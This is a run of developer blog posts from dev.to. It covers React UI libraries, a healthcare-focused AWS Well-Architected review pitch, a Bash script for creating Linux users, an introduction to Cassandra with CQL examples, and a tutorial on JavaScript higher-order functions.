styles through [styles API](https://mantine.dev/styles/styles-api/). #### Advantages & Disadvantages \+ Complete components and custom hooks. \+ Clean design. \+ Highly customizable. \+ Developer friendly. ± Good for medium-large projects, but overkill for small projects. \- Community support is still small, but growing. \- Bloated CSS from unused components. ### 4. Chakra UI - Simple, Modular & Accessible UI Library Chakra UI is a simple and accessible React UI library with composable and highly customizable components. It is also very developer-friendly and easy to use for beginners. When we wrote this article, Chakra UI's latest stable version was 2.8.2. It has 60+ components, 37k GitHub stars, 600+ contributors, and is used by more than 309,000 projects on GitHub. #### How to use Chakra UI + Examples You can add Chakra UI to your project by running this command: ```shell npm i @chakra-ui/react @emotion/react @emotion/styled framer-motion ``` You also need to wrap your application root with `ChakraProvider` ```jsx import { ChakraProvider } from '@chakra-ui/react' function App() { return ( <ChakraProvider> <TheRestOfYourApplication /> </ChakraProvider> ) } ``` You can go to [its official documentation](https://v2.chakra-ui.com) for more details about Chakra UI. The following image is a screenshot of Chakra UI basic components implementation. You can check the live demo and codes in Stackblitz. ![chakraui-examples](https://delicate-dawn-ac25646e6d.media.strapiapp.com/chakra_ui_4dae103130.jpg) [![Open in StackBlitz](https://developer.stackblitz.com/img/open_in_stackblitz.svg)](https://stackblitz.com/~/github.com/syakirurahman/chakraui-examples) #### Accessibility & Performance Every Chakra UI component is built with a WAI-ARIA pattern and documented keyboard navigation support. Generally, Chakra UI components are robust and performant. In Chakra UI version 2, each component can be imported individually. This ability can decrease the application bundle size, thus improving performance. #### Customization Chakra UI uses CSS-in-JS, offering customization at a slight performance cost. This is due to runtime style computations and className generation, which might be noticeable in performance-sensitive, large apps. However, Chakra UI is an excellent option for small to medium applications. #### Advantages & Disadvantages \+ Highly customizable. \+ Easy to use & developer friendly. \+ Good community support. \+ Accessible & composable components. ± Good for small-medium project. \- Fewer components compared to other UI libraries. \- CSS-in-JS might decrease component performance. ### 5. Shadcn UI - Beautifully Designed Components Shadcn UI is a collection of accessible and customizable open-source UI components. Unlike other UI libraries, Shadcn is not available like the npm package. It provides a CLI tool for adding UI component codes directly into your project. Shadcn is relatively new but quickly gained popularity thanks to its unlimited customization options. Shadcn can be used as a reference for your UI library. When this article was written, Shadcn had 48 components, 62.8k GitHub stars, and 191 contributors. #### How to use Shadcn UI + Examples Shadcn is dependent on Tailwindcss for styling. So, you need to install Tailwindcss first before installing Shadcn CLI. To install Shadcn CLI, you can run: ```shell npx shadcn-ui@latest init ``` There will be a prompt for configuration options. After that, you can start adding a component code to your project by running: ```shell npx shadcn-ui@latest add button ``` It will copy button component codes to your component folder, where you can import and use the component. ```jsx import { Button } from "@/components/ui/button" export default function Home() { return ( <div> <Button>Click me</Button> </div> ) } ``` There are some additional setups you need to do based on the library you use for your project. It is documented in [official installation docs](https://ui.shadcn.com/docs/installation). The following image is a screenshot of how Shadcn components look like. You can check the live demo and codes in Stackblitz. ![shadcn-examples](https://delicate-dawn-ac25646e6d.media.strapiapp.com/shadcn_104b49989e.jpg) [![Open in StackBlitz](https://developer.stackblitz.com/img/open_in_stackblitz.svg)](https://stackblitz.com/~/github.com/syakirurahman/shadcn-examples) #### Accessibility & Performance Shadcn components are built on top of [Radix UI components](https://www.radix-ui.com/) and follow WAI-ARIA authoring practices. Radix UI accessibility is tested in many modern browsers and commonly used assistive technologies. Shadcn components are also efficient and performant. The bundle size is relatively small since you only need to add the components you want to use. It depends on how many elements you use. #### Customization With access to the component codes, Shadcn offers unlimited customization options. You can customize the component classes with Tailwind CSS and even add new props. #### Advantages & Disadvantages \+ Accessible and lightweight. \+ Modular. \+ Highly customizable. \+ Clean design. \+ Good for any project, small to large projects. \- Not beginner friendly. \- Still new, Community support still small. ## Choosing the Right Library Because it's one of the best UI libraries, it will only fit some of your project requirements. Before using a UI library, make sure it fits with: - Your project type and size - Team member experience - Your familiarity with the library - Design compatibility with your brand/project ## Conclusion We researched this post as much as we could to provide an accurate and accountable review, but in the end, the decision is on you. We are just giving you more insights. By reading this article, we hope you can now decide on the UI library that fits your projects.
syakirurahman
1,909,045
AWS Well-Architected Framework Review: Empowering Healthcare Industry
Technology is quintessential in the evolving field of healthcare and life sciences to elevate patient...
0
2024-07-02T14:45:09
https://dev.to/techpartner/aws-well-architected-framework-review-empowering-healthcare-industry-3hg
healthcare, aws, wellarchitected
Technology is quintessential in the evolving field of healthcare and life sciences to elevate patient care, automate operations and in medical research. It can be daunting to handle and enhance these technological systems. This is where the AWS Well Architected Framework with a Healthcare lens becomes extremely beneficial. [The AWS Well Architected Framework Review (WAFR)](https://aws.amazon.com/architecture/well-architected/?wa-lens-whitepapers.sort-by=item.additionalFields.sortDate&wa-lens-whitepapers.sort-order=desc&wa-guidance-whitepapers.sort-by=item.additionalFields.sortDate&wa-guidance-whitepapers.sort-order=desc) is a cloud infrastructure design and review methodology that helps you leverage the unique advantages of cloud and to secure, optimize and maintain your cloud environments. The WAFR defines six pillars: **Operational Excellence, Security, Reliability, Performance Efficiency, Cost Optimization and Sustainability.** Each of these six pillars consist of design principles which are the best practices of cloud infrastructure. The six pillars are the criteria for evaluating cloud-based infrastructures and identifying areas that require enhancement. During the execution of the Well-Architected Framework Review for healthcare companies, the "Healthcare Lens" incorporates industry specific guidelines, design principles and best practices customized to address the distinctive requirements of the healthcare and life sciences sector. It focuses on – compliance with healthcare regulations, data security, optimizing efficacy in delivering patient care services and managing costs. It also nurtures innovation in medical research endeavors and treatment practices. **AWS Well-Architected Framework: Healthcare Lens** **Operational Excellence:** - Automate processes to reduce human error, ensure compliance, and maintain availability of critical healthcare services. - Key Points to review: Continuous improvement, operational monitoring, quick issue resolution. **Security:** - Protect patient data with HIPAA, GDPR and other compliance frameworks, strong access controls, and encryption. - Key Points to review: Multi-factor authentication, regular security assessments, updated security protocols. **Reliability:** - Ensure system resilience and quick recovery to minimize patient care disruption. - Key Points to review: - Redundancy, automated recovery, regular disaster recovery drills - RPO (Recovery Point Objective): The maximum acceptable amount of data loss measured in time. - RTO (Recovery Time Objective): The maximum acceptable time to restore the system after a failure. **Performance Efficiency:** - Optimize application performance for variable workloads, especially during peak times. - Key Points to review: Auto-scaling, right-sizing, performance metric reviews. **Cost Optimization:** - Manage cloud costs effectively to avoid resource wastage while maintaining quality patient care. - Nearly a third of cloud spend is wasted, highlighting the need for effective cost management ([Flexera 2024 State of the Cloud Report](https://www.flexera.com/stateofthecloud)). - Key Points to review: FinOps practices, cost allocation tags, regular resource review. **Sustainability:** - Support climate goals by reducing the carbon footprint of cloud operations. - Key Points to review: Optimize energy consumption, use energy-efficient instances, leverage renewable energy. **Impact of WAFR Healthcare Lens on various Healthcare Services** Here are some key examples where applying Healthcare Lens can significantly enhance healthcare services: **1. Electronic Health Record (EHR) Systems:** - Benefits: Enhances data integrity, availability, and security while ensuring compliance with healthcare regulations like HIPAA. Improves scalability and performance to handle large volumes of patient data. **2. Telemedicine and Remote Patient Monitoring:** - Benefits: Increases accessibility to healthcare services, particularly in remote areas, and enables continuous health monitoring. Supports timely medical interventions and better chronic disease management. **3. Health Information Exchanges (HIE):** - Benefits: Facilitates secure, real-time data sharing across different healthcare providers, enhancing interoperability and coordination of patient care. Reduces duplication of tests and procedures. **4. Clinical and Research Data Lakes:** - Benefits: Centralizes clinical and research data, supporting advanced analytics and machine learning. Ensures data privacy and compliance, accelerating medical research and improving data-driven decision-making. **5. Genomic Data Processing and Analysis:** - Benefits: Provides scalable compute resources for high-throughput sequencing, ensuring secure storage and compliance. Accelerates genetic research and personalized medicine initiatives. **6. AIML in Healthcare:** - Benefits: Generative AI and Machine Learning is being applied to many workflows in healthcare such as predicting health outcomes, improving patient access to care, revenue cycle operations and provider workflows. Healthcare lens oversees best practices to adhere to regulatory oversight, design control obligations, and interpretability requirements. For detailed information on these and other scenarios, refer to the [AWS documentation.](https://docs.aws.amazon.com/wellarchitected/latest/healthcare-industry-lens/scenarios.html) **The Grave Consequences of Misconfigurations in Cloud Architectures** **1. Data Breaches:** Misconfigurations in cloud storage and database settings has led to breaches of millions of patient records causing significant harm, particularly in the healthcare field. According to IBM Security '[Cost of a Data Breach](https://www.ibm.com/reports/data-breach)’ report in 2023 found that the average cost of a data breach in healthcare has surged to $11 million, a 53% increase from 2020. This figure surpasses the average of $4.45 million for data breaches across industries. **2. Compliance Violations:** Misconfigurations in deploying cloud architectures in the right regions can result in violation of regulations like HIPAA and GDPR. These violations can be levied very huge sums of money for fines and permanently damage an organization’s credibility and public image. The U.S. Department of Health and Human Services Office for Civil Rights (OCR) resolved several cases of HIPAA violations leading to significant penalties in the year 2023. ([HHS.gov](https://www.hhs.gov/hipaa/for-professionals/compliance-enforcement/data/enforcement-highlights/index.html)) **3. Disruptions in Services:** Downtime due to improper set up of cloud resources can affect patient care which is a crucial factor for the healthcare sector. A survey conducted by [LogicMonitor](https://www.logicmonitor.com/resource/outage-impact-survey#:~:text=96%25%20of%20global%20IT%20decision,Downtime%20is%20expensive.) revealed that 96% of participants encountered one cloud outage in the last three years with an average downtime period lasting around 7 hours. **Deliverables of the AWS Well Architected Framework Review** **1. Gap Analysis Report:** Detailed report on issues in cloud infrastructure and deviations from AWS best practices and compliance requirements. **2. Recommendations:** Suggested actions based on their impact on the AWS six pillars, with prioritization in terms of level of risk. **3. Roadmap to Fix Issues:** Outlines actions needed to fix the gaps, including timelines and resource requirements while highlighting possible dependencies. **4. Visibility on Risks:** Provides clear visibility into risks associated with misconfigurations and non-compliance. This ensures one is fully aware of the consequences and is mindful of these risks. **5. Continuous Improvement Plan:** Establishes processes for continuous monitoring, review, and betterment of cloud architecture. The Well Architected Framework Review helps healthcare and life sciences organizations identify gaps and offers a plan to address security, compliance and operational issues in their cloud setups. In an industry where the stakes are high, proactive measures to mitigate risks and optimize cloud architectures are essential for long-term success. AWS recommends conducting Well-Architected Framework Reviews (WAFRs) regularly to ensure continued alignment of cloud architectures with best practices and business objectives. Reviews should be conducted at least annually or after significant changes to the architecture. Here’s where we come in – [Techpartner Alliance](https://www.techpartneralliance.com/) is an AWS advanced partner and a certified [AWS-Well Architected Review Partner](https://www.techpartneralliance.com/well-architected-review/). This is to say, we are fully equipped to conduct the Well Architected Framework Review, especially with the Healthcare lens for your technological infrastructure. We will partner with you on your journey to build cloud infrastructure in line with the design principles of the six pillars of the Well-Architected Framework. Follow our [LinkedIn Page](https://www.linkedin.com/company/techpartner-alliance/) and check out our other [Blogs](https://www.techpartneralliance.com/blogs/) to stay updated on the latest tech trends and AWS Cloud. Schedule your complimentary [AWS Well-Architected Framework Assessment Now](https://forms.gle/kHJctfwhtxJiCSTH9)
arunasri
1,909,047
Technical Article: User Management Script with Enhanced Security
This article explores a Bash script designed to automate user creation and management on Linux...
0
2024-07-02T14:40:58
https://dev.to/divinechizoba/technical-article-1lkc
This article explores a Bash script designed to automate user creation and management on Linux systems. It prioritizes security by utilizing secure file permissions and secure password storage. **Learning More about HNG Internship** This script can be a valuable tool for system administrators managing user accounts within organizations. To explore opportunities for such automation, consider checking out the HNG program [HNG](https://hng.tech/). **Script Functionality** The script takes a user file as input, where each line specifies a username and optionally, a comma-separated list of groups. Here's a breakdown of its key functionalities: **Secure File Handling:** Log file ($LOG_FILE (`LOG_FILE="/var/log/user_management.log"`)): is used to log actions performed by the script. Password file ($PASSWORD_FILE (`PASSWORD_FILE="/var/secure/user_passwords.txt"`)): Stores usernames and randomly generated passwords with restricted permissions (chmod 600(`chmod 600 $PASSWORD_FILE`)). **Password Generation Function:** The generate_password function generates a 16-character random password using /dev/urandom (`generate_password() {< /dev/urandom tr -dc A-Za-z0-9 | head -c 16}`). **File Existence Check:** The script checks if the user data file provided as an argument exists. If not, it exits with an error message.`if [ ! -f "$1" ]; then echo "User file not found! "exit 1 fi` **Ensuring Log and Password Files:** The script ensures that the log file and password file exist and sets appropriate permissions for security. `touch $LOG_FILE mkdir -p $(dirname $PASSWORD_FILE) touch $PASSWORD_FILE chmod 600 $PASSWORD_FILE` **Reading and Processing User Data:** The script reads the user data file line by line, expecting each line to contain a username and groups separated by a semicolon (;). `while IFS=';' read -r username groups; do # Trim whitespace username=$(echo "$username" | xargs) groups=$(echo "$groups" | xargs)` **Creating Users and Groups:** For each user, the script: Trims any leading or trailing whitespace. `while IFS=';' read -r username groups; do # Trim whitespace username=$(echo "$username" | xargs) groups=$(echo "$groups" | xargs)` Checks if the user already exists and skips if so. `if id "$username" &>/dev/null; then echo "User $username already exists. Skipping..." | tee -a $LOG_FILE continue fi` Creates the user with a home directory and the /bin/bash shell. `useradd -m -s /bin/bash "$username" if [ $? -ne 0 ]; then echo "Failed to create user $username" | tee -a $LOG_FILE continue fi ` Creates a personal group named after the user. ` groupadd "$username"` Processes additional groups, sanitizes them to handle special characters, checks for their existence, and creates them if necessary. `IFS=',' read -r -a group_array <<< "$groups" for group in "${group_array[@]}"; do group=$(echo "$group" | xargs) # Handle group names with special characters group=$(echo "$group" | sed 's/[^a-zA-Z0-9_-]//g') # Check if the group exists, if not create it if ! getent group "$group" > /dev/null; then groupadd "$group" fi` Adds the user to the specified groups. `# Add user to group usermod -aG "$group" "$username" done` **Password Assignment:** Generates a random password for each user and assigns it. `password=$(generate_password) # Set the password for the user echo "$username:$password" | chpasswd` **Logging Actions:** Logs the creation of each user and their assigned groups. `echo "Created user $username with groups $groups" | tee -a $LOG_FILE` Stores the username and generated password in the secure password file. `echo "$username:$password" >> $PASSWORD_FILE` **Setting Permissions:** Sets appropriate permissions on the log and password files for security. `chmod 600 $PASSWORD_FILE chmod 644 $LOG_FILE` Here redirects you to my [GitHub](https://github.com/divine299/user-management-script/blob/ca3fac59d757e6332d549f89924aaa13bc551747/create_users.sh) page containing the entire code and its documentation **Conclusion** This Bash script is a powerful tool for automating user management tasks on a Linux system. By reading user data from a file, it can create users, assign them to groups, and generate secure passwords efficiently. This script can save time and reduce the risk of errors compared to manual user management. For more information on automating tasks and improving your DevOps skills, consider exploring the [HNG Internship Program](https://hng.tech/internship) and learn how you can hire top talent from their pool of skilled interns. The HNG Internship ([Premium](https://hng.tech/premium)) is an excellent opportunity for budding developers to gain real-world experience and for companies to find talented professionals. This script is just one example of the kind of practical skills you can develop through programs like the HNG Internship. Happy automating!
divinechizoba
1,909,044
Introduction to Cassandra Database: Features, Commands, and Data Structures
Introduction Apache Cassandra is an open-source NoSQL database renowned for its...
0
2024-07-02T14:38:06
https://blog.spithacode.com/posts/87840dea-3ac0-478c-8353-c3ff91ce0f42
nosql, webdev, javascript, beginners
## Introduction Apache Cassandra is an open-source NoSQL database renowned for its scalability and high availability without compromising performance. This article provides a detailed introduction to Cassandra, covering its main features, commands, data structures, and the underlying principles that make it an ideal choice for handling massive data workloads. ## Understanding Cassandra ### Introduction to Cassandra Apache Cassandra is a distributed NoSQL database designed to handle large amounts of data across many commodity servers, providing high availability with no single point of failure. It is designed to manage large volumes of data with high write throughput and low latency. ### History and Development Cassandra was initially developed by Facebook for their inbox search feature and later open-sourced in 2008\. The database has since evolved with contributions from a large community and various organizations, making it robust and feature-rich. ## Main Features of Cassandra ### No Single Point of Failure Cassandra's architecture is designed to ensure there is no single point of failure. It uses a peer-to-peer distribution model, where all nodes in a cluster are equal. Data is distributed across the cluster to ensure reliability and availability. ### Peer-to-Peer Architecture Cassandra's peer-to-peer architecture means that all nodes in the cluster communicate with each other equally. There are no master or slave nodes, which helps in achieving high availability and fault tolerance. ### Always Writable Cassandra allows data to be written at any time, regardless of the state of the cluster. This is particularly important for applications that require high write throughput and cannot afford downtime. ### Read and Write Anywhere Users can connect to any node in any data center to read and write data. This flexibility ensures that operations can continue seamlessly even if some nodes or data centers are down. ### Linear Performance Improvement Cassandra's performance improves linearly with the addition of new machines. For example, doubling the number of machines approximately doubles the performance, making it highly scalable. ### User-Defined Data Replication Data in Cassandra is replicated according to the user's needs, with strategies like SimpleStrategy and NetworkTopologyStrategy. ### Fastest NoSQL Database for Write Operations Cassandra is known for its fast write operations, making it ideal for applications that require high write throughput. ### Consistency Levels in Cassandra Cassandra provides three consistency levels for writing data: One, ALL, and Quorum, allowing users to balance between performance and data consistency. ## Data Replication Strategies ### SimpleStrategy In SimpleStrategy, data is replicated to the next server in a clockwise direction based on the IP address. It is straightforward and best suited for single data center deployments. ### NetworkTopologyStrategy NetworkTopologyStrategy is used for more complex replication across multiple data centers. It allows fine-grained control over replication to ensure data durability and availability across different geographical locations. ## Consistency Levels in Detail ### Consistency Level One At this level, data is written to at least one node. This provides the lowest latency but at the cost of lower consistency. ### Consistency Level All This level ensures that data is written to all replica nodes. It provides the highest consistency but can result in higher latency. ### Consistency Level Quorum At Quorum level, data is written to a majority of the replica nodes (N/2 + 1). This strikes a balance between consistency and latency. #### Changing Consistency Levels Consistency levels can be specified in the insert clause or in the Cassandra shell (cqlsh). For example: ``` cqlCopy codecqlsh:tp2> CONSISTENCY Current consistency level is ONE. cqlsh:tp2> CONSISTENCY ALL Consistency level set to ALL. cqlsh:tp2> CONSISTENCY QUORUM Consistency level set to QUORUM. ``` ## Basic Commands in Cassandra ### Creating a Keyspace A keyspace in Cassandra is a namespace that defines data replication on nodes. To create a keyspace: ``` cqlCopy codeCREATE KEYSPACE IF NOT EXISTS my_keyspace WITH REPLICATION = {'class':'SimpleStrategy' , 'replication_factor':3}; ``` This command creates a keyspace named my\_keyspace with a replication factor of 3 using SimpleStrategy. ### Altering a Keyspace To alter an existing keyspace, for instance, changing its replication strategy: ``` cqlCopy codeALTER KEYSPACE my_keyspace WITH REPLICATION = {'class':'NetworkTopologyStrategy', 'datacenter1':3, 'datacenter2':2}; ``` This command alters my\_keyspace to use NetworkTopologyStrategy with replication factors specified for two data centers. ### Creating a Table Tables in Cassandra are created within a keyspace. An example command: ``` cqlCopy codeCREATE TABLE my_table ( id int PRIMARY KEY, name text, age int, city text); ``` This command creates a table named my\_table with columns id, name, age, and city. ### Inserting Data Normally To insert data into a table: ``` cqlCopy codeINSERT INTO my_table (id, name, age, city) VALUES (1, 'John Doe', 30, 'New York'); ``` This inserts a row into my\_table with the specified values. ### Inserting Data with JSON Cassandra allows inserting data using JSON format: ``` cqlCopy codeINSERT INTO my_table JSON '{ "id": 2, "name": "Jane Doe", "age": 25, "city": "Los Angeles" }'; ``` This command inserts a row into my\_table using a JSON string. ### Inserting Data from a CSV File Data can also be imported from a CSV file: ``` cqlCopy codeCOPY my_table (id, name, age, city) FROM 'data.csv' WITH HEADER=true; ``` This command copies data from data.csv into my\_table. ## Partitioning in Cassandra ### Random Partitioning Random partitioning uses a hash value of the partition key to distribute data across nodes. It ensures even data distribution and is the recommended approach. ### Sorted Partitioning Sorted partitioning orders data lexicographically by partition key. It is less commonly used due to potential hotspots and uneven data distribution. ## Understanding Cassandra Terminology ### Column Family A column family in Cassandra is similar to a table in relational databases. Each row in a column family has a unique identifier called a RowId. ### RowId RowId uniquely identifies a row within a column family. ### Column Definition A column is defined by its name, value, and timestamp, which is used to resolve conflicts during reads and writes. ### Table Queries and Partitions A table in Cassandra contains multiple partitions, each identified by a partition key. Queries are typically optimized to access specific partitions. ### Map Representation of Tables Tables can be visualized as a Map<PartitionKey, SortedMap<Clustering, Row>>. This structure helps in understanding the distribution and ordering of data. ## Data Types in Cassandra ### Basic Data Types Cassandra supports basic data types such as int, varchar, text, and boolean. ### Complex Data Types #### Sets Sets are collections of unique values. Example: ``` cqlCopy codeCREATE TABLE client (id INT PRIMARY KEY, name VARCHAR, products SET<int>); INSERT INTO client (id, name, products) VALUES (1, 'Alice', {101, 102, 103}); UPDATE client SET products = products + {104} WHERE id = 1; UPDATE client SET products = products - {103} WHERE id = 1; DELETE products FROM client WHERE id = 1; ``` These commands demonstrate CRUD operations with sets. #### Lists Lists are ordered collections. Example: ``` cqlCopy codeCREATE TABLE client (id INT PRIMARY KEY, name VARCHAR, orders LIST<int>); INSERT INTO client (id, name, orders) VALUES (2, 'Bob', [201, 202, 203]); UPDATE client SET orders = orders + [204] WHERE id = 2; UPDATE client SET orders[1] = 205 WHERE id = 2; DELETE orders[2] FROM client WHERE id = 2; ``` These commands show how to work with lists in Cassandra. #### Maps Maps are key-value pairs. Example: ``` cqlCopy codeCREATE TABLE client (id INT PRIMARY KEY, name VARCHAR, addresses MAP<int, text>); INSERT INTO client (id, name, addresses) VALUES (3, 'Charlie', {1:'Home', 2:'Office'}); UPDATE client SET addresses = addresses + {3:'Gym'} WHERE id = 3; UPDATE client SET addresses[2] = 'HQ' WHERE id = 3; DELETE addresses[1] FROM client WHERE id = 3; ``` These commands illustrate CRUD operations with maps. ## FAQs about Cassandra ### What is Apache Cassandra used for? Cassandra is used for managing large amounts of structured and unstructured data across multiple servers, ensuring high availability and fault tolerance. ### How does Cassandra ensure high availability? Cassandra ensures high availability through its peer-to-peer architecture and data replication strategies, allowing it to continue operations even if some nodes fail. ### What are the advantages of using Cassandra over other databases? Cassandra offers advantages such as scalability, high write throughput, no single point of failure, and flexible data modeling, making it suitable for big data applications. ### How does Cassandra handle data replication? Cassandra handles data replication through strategies like SimpleStrategy and NetworkTopologyStrategy, replicating data across nodes to ensure durability and availability. ### What is the default consistency level in Cassandra? The default consistency level in Cassandra is ONE, meaning data is written to at least one node. ### How can I change the consistency level in Cassandra? Consistency levels can be changed using the CONSISTENCY command in cqlsh or specified in the insert clause of a query. ## Conclusion ### Summary of Cassandra's Features and Benefits Cassandra stands out for its robust architecture, scalability, high availability, and performance. Its ability to handle large volumes of data with minimal latency makes it an essential tool for modern data management. By providing a peer-to-peer architecture, Cassandra ensures no single point of failure and allows for continuous read and write operations. Its data replication strategies and consistency levels offer flexibility in balancing performance and reliability. Cassandra's support for complex data types and structures further enhances its capability to meet diverse data management needs. ### Future of Cassandra in Data Management As data continues to grow exponentially, Cassandra's capabilities will remain crucial in managing, storing, and analyzing big data. Its community-driven development ensures continuous improvement and adaptation to emerging data challenges. The future of data management will increasingly rely on scalable, reliable, and flexible databases like Cassandra, making it a valuable asset for organizations looking to leverage their data for strategic advantages.
stormsidali2001
1,885,526
A Guide to Higher-Order Functions in JavaScript
Photo by Growtika on Unsplash If you work with JavaScript, then you might have encountered...
0
2024-07-02T14:35:35
https://blog.stackademic.com/a-guide-to-higher-order-functions-in-javascript-65d061b0465c
javascript, beginners, programming
Photo by [Growtika](https://unsplash.com/@growtika?utm_source=medium&utm_medium=referral) on [Unsplash](https://unsplash.com?utm_source=medium&utm_medium=referral) If you work with JavaScript, then you might have encountered higher-order functions. This is not to mean that they are only limited to JavaScript alone. On the contrary higher-order functions are a fundamental aspect of functional programming that can be found in various programming languages. The ability to use higher-order functions is more linked with the language’s support for functional programming and the programming paradigm in play. In this article we’ll dig deeper into what higher-order functions are, their use case scenarios, benefits, and some common mistakes encountered while using them in JavaScript. --- ### What is a higher-order function? A higher-order function is a function that takes one or more functions as arguments or returns a function as its result. In that definition lies the key characteristics of identifying a higher-order function: * Takes a function as an argument. * Returns a function. This whole concept of higher-order functions in programming is borrowed from mathematics, specifically from the field of functional programming and lambda calculus (a little nerdy note 😁). In lambda calculus and mathematical logic, functions are considered first-class citizens, meaning they can be treated as values, passed as arguments to other functions, and returned as results from functions. For example, the derivative operator in calculus is a higher-order function that maps a function to its derivative, which is also a function. Similarly, in JavaScript, filter() is a higher-order function that works on an array and takes another function as an argument that it’ll use to return a new filtered version of the array. Now that we know what higher-order functions are, let’s move on to their applications: --- ### Common Use Cases ### 1\. Callback functions A callback function is simply a function that is passed as an argument to another function and is executed inside the outer function to complete some routine or action. This technique allows a function to call another function. Callback functions are commonly used in asynchronous programming to handle tasks that may take time to complete such as a network request or handling an event for example a button click or a timer expiration. Let’s implement a simple instance of callbacks in play within an asynchronous task: ``` // Asynchronous application of a callback function function getDataFromServer(callback) { // Simulating a server request with a setTimeout setTimeout(function() { const data = 'Data from the server'; callback(data); }, 2000); } // Callback function to handle the data function displayData(data) { console.log('Data received: ' + data); } // Calling the function with the callback getDataFromServer(displayData); ``` > In this example, we use the getDataFromServer function to simulate a server request using setTimeout and then call the callback function with the data after 2 seconds. The displayData function is the callback that handles the received data. When getDataFromServer is called with displayData as the callback, it logs the received data after 2 seconds. This demonstrates the asynchronous nature of the callback, as the data is handled after the server request is complete. --- ### 2\. Array Methods Array methods are functions that can be called on an array object to perform various operations on the array. They are quite a number but **not all** of them are higher-order functions it should be noted. The higher-order array methods are: * forEach() * map() * sort() * filter() and * reduce() Let’s take a quick look at each: ### **1\. forEach()** This is a higher-order function that iterates over each item of an array executing the function passed in as an argument for each item of the array. Illustration: ``` const numbers = [1, 2, 3, 4]; numbers.forEach((num) => console.log(num)); // Output: 1, 2, 3, 4 ``` ### 2\. map() This higher-order function returns a new array based on the results from the function passed in as an argument and called on each element of the original array. Illustration: ``` const numbers = [1, 2, 3, 4, 5]; const doubledNumbers = numbers.map((num) => num * 2); console.log(doubledNumbers); // Output: [2, 4, 6, 8, 10] ``` > Each element from the numbers array is multiplied by 2 to create a new array through the **map()** method. ### 3\. sort() As the name suggests when called on an array it sorts it and returns it in default ascending order. Under the hood though, it changes each element into a string and compares their sequence. You could use **sort** without passing a function in as an argument, however, this only works well for string arrays but not for numbers. Hence if you’re going to use **sort** on numbers you pass in a compare function as an argument. The compare function takes 2 arguments. Illustration: ``` const numbers = [6, 9, 3, 1]; numbers.sort((a, b) => a - b); // After sorting: [1, 3, 6, 9] ``` > In the code above: > The negative value (a < b) => a will be placed before b > The zero value (a== b) => No change > The positive value (a > b) => a will be placed before b ### **4\. filter()** This method returns a new array with all elements that satisfy the condition implemented by the function passed. The function passed should always return a boolean value. ``` const numbers = [1, 2, 3, 4]; const evenNumbers = numbers.filter((num) => num % 2 === 0); // Result: [2, 4] ``` > The condition in the body of the passed in function is evaluated for each element in the numbers array to return a new array of only values that satisfy it. ### 5\. reduce() This method takes in 2 arguments a callback function and an initial value. The callback function takes 2 parameters an accumulator (which is set to the initial value at the start) and current value that run on each element in the array to return a single value in the end. Illustration: ``` const numbers = [1, 2, 3, 4, 5]; const sum = numbers.reduce(function(acc, num) { return acc + num; }, 0); console.log(sum); // Output: 15 ``` > The value of acc is 0 and that of num is the first item of the array at the start of execution. As reduce iterates over the array the acc value changes to the value returned after summation. This new value of acc is then applied to the next iteration. This continues until the end of the array. --- ### 3\. Functional composition Functional composition is the act of combining multiple smaller functions by chaining them together to obtain a single more complex function. In this approach, a function in the chain operates on the output of the previous function in the composition chain. To enable functional composition in JavaScript we use the **compose** function. A **compose** function is a higher-order function that, takes in two or more functions and returns a new function that applies these functions in right-to-left order. Let's dive into an example: * The first step is to define the compose function: ``` const compose = (...functions) => { return (input) => { return functions.reduceRight((acc, fn) => { return fn(acc); }, input); }; }; ``` > In the above implementation, the **compose** function takes in any number of functions as arguments by using the **spread** operator. > It returns a new function that iterates over the functions in reverse order using **reduceRight**, applying each function to the accumulated result. * The next step is to now use the compose function: ``` const addOne = x => x + 1; const multiplyByTwo = x => x * 2; const addOneAndMultiplyByTwo = compose(multiplyByTwo, addOne); console.log(addOneAndMultiplyByTwo(5)); // Output: 11 ``` > Above the entered value is first multiplied by 2 then added a one by applying the functions passed to compose from right to left. --- ### Benefits of Higher Order Functions We have seen that there are quite several applications for higher-order functions. This indicates that they do offer some benefits to programmers to warrant their use. Let’s take a look at these benefits: * **Abstraction**: Higher order functions allow you to hide the implementation details behind clear function names improving the readability and understanding of code. For instance, without this type of functions iterating over arrays would need the use of loops which can clutter code, especially in a large codebase, and make it more complicated. * **Reusability**: Higher-order functions encapsulate the same logic into reusable functions. This means they can be reapplied throughout the codebase without the need to create them from scratch at every instance. * **Immutability**: Many higher-order functions operate on data immutably, creating new structures instead of modifying existing ones. This helps avoid unintended side effects and makes your code more predictable and easier to debug. * **Modularity**: Higher-order functions facilitate breaking down complex problems into smaller, manageable parts, promoting modular design. --- ### Common mistakes when working with Higher Order Functions (HOFs) Higher-order functions do offer numerous benefits as seen above, but it’s essential to be aware of the potential pitfalls that can cause bugs and unexpected results. Some common mistakes to avoid: * **Not returning a value**: Most HOFs like map, filter, and reduce expect the function passed in as an argument to return a value for each element processed. In this instance forgetting to return a value can disrupt the chain and lead to undefined results. * **Not using the correct syntax**: HOFs can be complex and it’s easy to make syntax errors when creating or using them. A good rule of thumb is to double-check the syntax and ensure functions are properly defined and called. * **Not using pure functions**: HOFs should not cause any side effects thus they should return the same output for a given input, to be pure functions. Using them in an impure manner could lead to unexpected behavior that makes debugging a nightmare. * **Overusing composition**: Functional composition is a powerful programming technical but excessive nesting of HOFs can increase the complexity of code making it harder to read and understand. Aim for a balance between conciseness and clarity, breaking down complex transformations into smaller, more readable steps if necessary. --- ### Conclusion As we reach the end, some key takeaways are: 1. Higher-order functions are functions that either take other functions as arguments or return them as output. 2\. Higher-order functions do have a lot of use cases some of them being in: * Callback functions, * Array methods, * Functional composition etc. 3\. Higher-order functions benefit programmers by providing: * Abstraction * Reusability * Immutability * Modularity 4\. As programmers, there are common mistakes that we may encounter when working with Higher-Order Functions. --- I hope this blog inspires a deeper understanding of higher-order functions and how you might be able to leverage them to solve real-world problems. The journey of learning is never-ending. Happy coding!
muchai_joseph
1,909,043
Average City Temperature Calculation Interview Question EPAM
Problem Statement: Average Temperature Calculation You are tasked with implementing a Java...
0
2024-07-02T14:30:38
https://dev.to/codegreen/average-city-temperature-calculation-interview-question-epam-ldd
java, collections, epam, coding
